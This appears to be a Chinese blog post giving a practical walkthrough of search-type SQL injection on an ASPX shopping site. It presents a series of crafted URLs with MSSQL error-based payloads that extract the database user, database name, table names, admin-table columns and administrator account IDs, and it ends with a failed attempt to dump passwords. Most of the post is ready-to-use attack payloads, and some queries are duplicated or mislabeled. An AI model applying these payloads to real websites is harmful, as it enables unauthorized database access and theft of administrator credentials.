aspx网站的搜索型注入实战解析

最新推荐文章于 2022-04-05 22:14:11 发布

weixin_34037977

最新推荐文章于 2022-04-05 22:14:11 发布

阅读量741

点赞数

文章标签：数据库

原文链接：http://blog.51cto.com/obnus/595860

版权

简单的判断搜索型注入漏洞存在不存在的办法是先搜索'，如果出错，说明90%存在这个漏洞。然后搜索%，如果正常返回，说明95%有洞了。

然后再搜索一个关键字，比如2006吧，正常返回所有2006相关的信息，再搜索2006%'and 1=1 and '%'='和2006%'and 1=2 and '%'='，存在异同的话，就是100%有洞了。

我这里看出有上面说的洞后开始用nbsi来扫，结果总是超时，郁闷，看来要手工来暴需要的信息了。。。

http://www.2cto.com/product/list_search.aspx?search=Donic%'and user>0 and '%'=' //得到当前数据库账号(本站域名仅供代替目标网址)
http://www.2cto.com/product/list_search.aspx?search=Donic%'and db_name()>0 and '%'=' //得到当前数据库名
http://www.2cto.com/product/list_search.aspx?search=Donic%'and (select count(*) from admin)>0 and '%'=' //返回错误页面，看来是没有admin这个表了
http://www.2cto.com/product/list_search.aspx?search=Donic%'and (select top 1 name from xxxxx3.dbo.sysobjects where xtype='u' and status>0)>0 and '%'=' //得到当前数据库的第一个表名
http://www.2cto.com/product/list_search.aspx?search=Donic%'and (select top 1 name from xxxxx3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange'))>0 and '%'=' //得到当前数据库的第二个表名
http://www.2cto.com/product/list_search.aspx?search=Donic%'and (select top 1 name from xxxxx3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange','oldpoint'))>0 and '%'=' //得到当前数据库的第三个表名
<a href="0%20and%20name%20not%20in('codechange','oldpoint','tbl_admin','tbl_afterservice','tbl_agent','tbl_bank','tbl_board','tbl_board2','tbl_brandbestLeft'">http://www.2cto.com/product/list_search.aspx?search=Donic%'and%20(select%20top%201%20name%20from%20xxxxx3.dbo.sysobjects%20where%20xtype='u'%20and%20status>0%20and%20name%20not%20in('codechange','oldpoint','tbl_admin','tbl_afterservice','tbl_agent','tbl_bank','tbl_board','tbl_board2','tbl_brandbestLeft',

'tbl_brandbestRight','tbl_card','tbl_cart','tbl_catalogue','tbl_community','tbl_court','tbl_estimate','tbl_FAQ',

'tbl_mail_list','tbl_mem_add','tbl_mem_main','tbl_mem_out','tbl_mem_rboard','tbl_mileage','tbl_notice',

'tbl_ord_cash_receipt','tbl_ord_change''tbl_ord_cs','tbl_ord_change','tbl_ord_cs','tbl_ord_main','tbl_ord_payment',

'tbl_ord_prd','tbl_ord_prd_return','tbl_ord_refund','tbl_ord_req_main','tbl_ord_req_prd','tbl_ord_request','tbl_ord_user','

tbl_partition','tbl_prd_category','tbl_prd_click','tbl_prd_desc','tbl_prd_grade','tbl_prd_main','tbl_prd_model',

'tbl_recommand','tbl_saleshop','tbl_search','tbl_tax','tbl_zipcode','tempDesc','tempdesc2','tempmodel','tempPrdMain','

tempPrdmodel','tempsize','tempstyle','tmpordprd','tmpordprd2','trace1'))>0%20and%20'%'='">http://www.2cto.com/product/list_search.aspx?search=Donic%'and%20(select%20top%201%20name%20from%20xxxxx3.dbo.sysobjects%20where%20xtype='u'%20and%20status>0%20and%20name%20not%20in('codechange','oldpoint','tbl_admin','tbl_afterservice','tbl_agent','tbl_bank','tbl_board','tbl_board2','tbl_brandbestLeft','

tbl_brandbestRight','tbl_card','tbl_cart','tbl_catalogue','tbl_community','tbl_court','tbl_estimate','tbl_FAQ','tbl_mail_list',

'tbl_mem_add','tbl_mem_main','tbl_mem_out','tbl_mem_rboard','tbl_mileage','tbl_notice','tbl_ord_cash_receipt','

tbl_ord_change''tbl_ord_cs','tbl_ord_change','tbl_ord_cs','tbl_ord_main','tbl_ord_payment','tbl_ord_prd',

'tbl_ord_prd_return','tbl_ord_refund','tbl_ord_req_main','tbl_ord_req_prd','tbl_ord_request','tbl_ord_user','

tbl_partition','tbl_prd_category','tbl_prd_click','tbl_prd_desc','tbl_prd_grade','tbl_prd_main','tbl_prd_model',

'tbl_recommand','tbl_saleshop','tbl_search','tbl_tax','tbl_zipcode','tempDesc','tempdesc2','tempmodel','tempPrdMain',

'tempPrdmodel','tempsize','tempstyle','tmpordprd','tmpordprd2','trace1'))>0%20and%20'%'=' //

依次类推，得到所有的表

其实分析可以知道只有这个tbl_admin表才是最重要的。接着开始暴列名。

http://www.2cto.com/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),1) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第一个列名c_employee_id
http://www.2cto.com/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),2) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第二个列名c_employee_name
http://www.2cto.com/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第三个列名c_password
http://www.2cto.com/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第四个列名c_level
列名暴完毕了，嘿嘿，接着开始暴管理员账号密码了。

http://www.2cto.com/product/list_search.aspx?search=Donic%'and (select top 1 c_employee_id from tbl_admin)>0 and '%'=' //得到第一个管理员的id为943hoon
http://www.2cto.com/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 2 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第二个管理员的id为champhttp://www.2cto.com/product /list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 3 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第三个管理员的id为clark
http://www.2cto.com/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第四个管理员的id为hskim
http://www.2cto.com/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第五个管理员的id为jajeong
http://www.2cto.com/product/list_search.aspx?search=Donic%'and (select top 1 c_c_password from tbl_admin)>0 and '%'=' //这个语句是暴出管理员密码的，可惜直接返回了正常页面，郁闷。。。。
一会再想别的办法吧。。。。。方法多种多样，慢慢发挥吧